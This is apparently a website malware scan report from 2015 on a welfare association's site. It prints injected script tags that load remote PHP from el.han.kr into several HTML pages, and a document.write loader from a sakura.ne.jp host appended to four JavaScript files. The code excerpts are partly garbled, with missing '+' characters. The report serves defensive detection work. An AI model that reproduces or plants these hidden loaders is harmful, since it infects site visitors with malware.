Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=awalwelfareassociation.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://awalwelfareassociation.com/ | 200 OK Content-Length: 19585 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889774"></script> | ||
http://awalwelfareassociation.com/_wp_scripts/jsFlashVer.js | 200 OK Content-Length: 7685 Content-Type: text/javascript | clean |
http://awalwelfareassociation.com/_wp_scripts/jspngfix.js | 200 OK Content-Length: 874 Content-Type: text/javascript | malicious |
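Malicious code - confirmed by antiviruses (see below). In the excerpt that follows, the closing document.write(...) call, which loads a script from a third-party host, is the part that looks injected; the code before it reads like the file's ordinary PNG-transparency routine, and the same closing call ends the jsValidation.js, jsMenus.js and jsRollover.js excerpts further down. The excerpt appears to have lost its "+" characters in extraction, so compare each file against a known-good copy rather than relying on this text. var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5|6)/.test(navigator.userAgent) && navigator.platform == "Win32"; function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase())) { src = src.replace(/\(/g, "(" ); src = src.replace(/\)/g, ")" ); event.srcElement.src = blankSrc; event.srcElement.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" src "',sizingMethod='scale')"; } else { event.srcElement.runtimeStyle.filter = "";} } } document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>') Antivirus reports: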
| ||
http://awalwelfareassociation.com/_wp_scripts/jsValidation.js | 200 OK Content-Length: 1677 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function ValidateEmail(sEmail) { var reEmail=/^(. )@(. )$/; var reQuotedString="(\"[^\"]*\")"; var reIPDomain=/^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$/; var reValidCharString="\[^\\s\\(\\)><@,;:\\\\\\\"\\.\\[\\]\] "; var reGetString="(" reValidCharString "|" reQuotedString ")"; var reUserName=new RegExp("^" reGetString "(\\." reGetString ")*$"); var reDomain=new RegExp("^" reValidCharString "(\\." reValidCharString ")*$"); } } return true; } function ltrim(str, chars) { chars = chars || "\\s"; return str.replace(new RegExp("^[" chars "] ", "g"), ""); } function rtrim(str, chars) { chars = chars || "\\s"; return str.replace(new RegExp("[" chars "] $", "g"), ""); } document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://awalwelfareassociation.com/_wp_scripts/jsMenus.js | 200 OK Content-Length: 9087 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wp_menus.prototype.m_type = 0; wp_menus.prototype.m_delay = 500; wp_menus.prototype.m_bordersize = 1; wp_menus.prototype.m_fontsize = 12; wp_menus.prototype.m_filterOpacity = 100; wp_menus.prototype.m_mozOpacity = 1; wp_menus.prototype.m_width = 0; wp_menus.prototype.m_padding = '3px 10px 3px 10px'; wp_menus.prototype.m_fontfamily = 'sans-serif'; wp_menus.prototype.m_bordercolor = '#000000'; wp_menus.prototype.m_bkgndcolor = 'transparent'; wp_menus.pro else { if(this.m_firstpopup == 1) top = top (p.offsetHeight - e.offsetHeight) / 2; else if(this.m_firstpopup == 2) top = (top p.offsetHeight) - e.offsetHeight; }} e.style.top = top "px"; e.style.left = left "px"; e.style.visibility = "visible"; } document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://awalwelfareassociation.com/_wp_scripts/jsRollover.js | 200 OK Content-Length: 2034 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) rolls = new Array(); numRolls=0; function PPFindObj(n, d) { var p,i,x; if( !d ) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p 1)].document; n=n.substring(0,p); } if( !(x=d[n])&&d.all ) x=d.all[n]; for( i=0;!x&&i<d.forms.length;i ) x=d.forms[i][n]; for( i=0;!x&&d.layers&&i<d.layers.length;i ) x=PPFindObj(n,d.layers[i].document); return x; } fun this.imgDownOver = new Image(); this.imgDownOver.src = downover; this.down = initDown; this.over = false; this.radio = radio; } function PPImgInit( name,normal,over,down,downover,initDown,radio ) { if (document.images) rolls[numRolls ] = new PPImg(name,normal,over,down,downover,initDown,radio); } document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://awalwelfareassociation.com/index.html | 200 OK Content-Length: 19585 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889774"></script> | ||
http://awalwelfareassociation.com/about.html | 200 OK Content-Length: 15230 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889767"></script> | ||
http://awalwelfareassociation.com/news.html | 200 OK Content-Length: 15748 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889775"></script> | ||
http://awalwelfareassociation.com/solutions.html | 200 OK Content-Length: 12902 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889780"></script> | ||
http://awalwelfareassociation.com/contact.html | 200 OK Content-Length: 16248 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889770"></script> | ||
http://awalwelfareassociation.com/diary.html | 200 OK Content-Length: 12472 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889772"></script> | ||
http://awalwelfareassociation.com/awal-function-2013.pdf | 200 OK Content-Length: 172751 Content-Type: application/pdf | clean |
http://awalwelfareassociation.com/test404page.js | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://awalwelfareassociation.com/on-sitetraining.html | 200 OK Content-Length: 9456 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889776"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: awalwelfareassociation.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 22:54:27 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 19585
Content-Type: text/html
Last-Modified: Sat, 01 Nov 2014 11:19:02 GMT
...19585 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: awalwelfareassociation.com
Referer: http://www.google.com/search?q=awalwelfareassociation.com
Result:
The result is similar to the first query. There are no suspicious redirects found.